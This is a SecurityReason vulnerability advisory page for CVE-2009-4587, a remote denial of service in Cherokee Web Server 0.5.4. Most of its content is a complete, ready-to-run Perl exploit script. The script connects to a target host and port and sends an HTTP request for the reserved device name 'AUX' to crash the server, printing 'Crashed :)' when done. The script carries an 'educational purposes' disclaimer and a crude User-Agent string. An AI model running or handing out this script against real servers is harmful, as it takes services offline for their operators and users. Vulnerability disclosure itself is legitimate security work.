|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 6929 CVE : CVE-2009-4587 CWE : CWE-OTHER SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : usman Published : 08.01.2010
Advisory Content : Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] [*] Download Page : http://www.cherokee-project.com/download/windows/ [*] Attack type : Remote [*] Patch Status : Unpatched [*] Exploitation : #!/usr/bin/perl # Cherokee Web Server 0.5.4 Denial Of Service # Disclaimer: # [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] # Author: Usman Saeed # Company: Xc0re Security Research Group # Website: http://www.xc0re.net # DATE: [25/10/09] $host = $ARGV[0]; $PORT = $ARGV[1]; $packet = "AUX"; $stuff = "GET /".$packet." HTTP/1.1\r\n" . "User-Agent:Bitch/1.0 (Windows NT 5.1; U; en)\r\n" . "Host:$host\r\n". "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n". "Accept-Language: en-US,en;q=0.9\r\n". "Accept-Charset: iso-8859-1,*,utf-8\r\n". "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n"; use IO::Socket::INET; if (! defined $ARGV[0]) { print "+========================================================+\n"; print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n"; print "+ Author [Usman Saeed] +\n"; print "+ Company [Xc0re Security Research Group] +\n"; print "+ DATE: [25/10/09] +\n"; print "+ Usage :perl sploit.pl webserversip wbsvrport +\n"; print "+ Disclaimer: [This code is for Educational Purposes , +\n"; print "+ I would Not be responsible for any misuse of this code]+\n"; print "+========================================================+\n"; exit; } $sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr => $host , PeerPort => $PORT) || die "Cant connect to $host!"; print "+========================================================+\n"; print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n"; print "+ Author [Usman Saeed] +\n"; print "+ Company [Xc0re Security Research Group] +\n"; print "+ DATE: [25/10/09] +\n"; print "+ Usage :perl sploit.pl webserversip wbsvrport +\n"; print "+ Disclaimer: [This code is for Educational Purposes , +\n"; print "+ I would Not be responsible for any misuse of this code]+\n"; print "+========================================================+\n"; print "\n"; print "[*] Initializing\n"; sleep(2); print "[*] Sendin DOS Packet \n"; send ($sock , $stuff , 0); print "[*] Crashed :) \n"; $res = recv($sock,$response,1024,0); print $response; exit; References : http://xforce.iss.net/xforce/xfdb/53957
http://xc0re.wordpress.com/2009/10/25/cherokee-web-server-0-5-4-denial-of-service/
http://www.securitytracker.com/id?1023095
http://www.securityfocus.com/bid/36814
http://www.securityfocus.com/archive/1/archive/1/507651/100/0/thread
http://www.securityfocus.com/archive/1/archive/1/507456/100/0/threaded  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |